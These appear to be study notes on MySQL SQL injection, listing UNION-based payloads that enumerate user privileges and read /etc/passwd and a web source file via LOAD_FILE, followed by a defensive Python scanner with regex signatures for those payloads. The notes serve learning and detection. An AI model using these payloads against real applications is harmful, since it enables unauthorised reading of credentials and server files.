• Using the query's logic:


  • Using comments


  • Privileges:

    • select super_priv from mysql.user;
    • ' UNION SELECT 1,super_priv,3,4 FROM mysql.user-- -
    • ' UNION SELECT 1,super_priv,3,4 FROM mysql.user WHERE user=""-- -
    • UNION SELECT 1, grantee, privilege_type, 4 FROM information_schema.user_privileges-- -
    • cn' UNION SELECT 1, grantee, privilege_type, 4 FROM information_schema.user_privileges WHERE grantee="'root'@'localhost'"-- -
  • LOAD_FILE PRIVILEGES

    • SELECT LOAD_FILE('/etc/passwd')
    • cn' UNION SELECT 1, LOAD_FILE("/var/www/html/search.php"), 3, 4-- -
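Added defensive example, not part of the original notes: a small Python scanner that URL-decodes logged query strings and flags the privilege-enumeration and LOAD_FILE patterns listed above. The request lines are constructed samples, and the signature names are my own.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample query strings, as a web server access log might record them.
SAMPLE_REQUESTS = [
    "q=cn",
    "q=cn%27+UNION+SELECT+1%2Csuper_priv%2C3%2C4+FROM+mysql.user--+-",
    "q=cn%27+UNION+SELECT+1%2C+grantee%2C+privilege_type%2C+4+FROM+information_schema.user_privileges--+-",
    "q=cn%27+UNION+SELECT+1%2C+LOAD_FILE%28%22%2Fvar%2Fwww%2Fhtml%2Fsearch.php%22%29%2C+3%2C+4--+-",
    "q=union+station+schedule",   # benign text that merely contains the word "union"
]

# Signatures for the enumeration steps above; applied after normalisation.
SIGNATURES = {
    "union_select": re.compile(r"\bunion\b\s+(all\s+)?select\b"),
    "mysql_user_table": re.compile(r"\bmysql\s*\.\s*user\b"),
    "info_schema_privs": re.compile(r"\binformation_schema\s*\.\s*user_privileges\b"),
    "load_file": re.compile(r"\bload_file\s*\("),
}


def normalise(raw: str) -> str:
    """URL-decode twice (catches double encoding), lowercase, drop inline
    /**/ comments and collapse whitespace so simple spacing tricks do not
    hide the tokens."""
    text = unquote_plus(unquote_plus(raw)).lower()
    text = re.sub(r"/\*.*?\*/", " ", text)
    return re.sub(r"\s+", " ", text)


def classify(raw: str) -> list:
    """Return the names of the signatures that fire on one request line."""
    text = normalise(raw)
    return [name for name, rx in SIGNATURES.items() if rx.search(text)]


def scan(lines):
    """Map each suspicious line to its signature hits; clean lines are omitted."""
    results = {}
    for line in lines:
        hits = classify(line)
        if hits:
            results[line] = hits
    return results


if __name__ == "__main__":
    for line, hits in scan(SAMPLE_REQUESTS).items():
        print(f"{hits}: {line}")
```

The web application's database account should not hold SUPER or FILE, so a hit on `load_file` against an account that lacks FILE is noise on the database side but still a useful signal of probing on the application side.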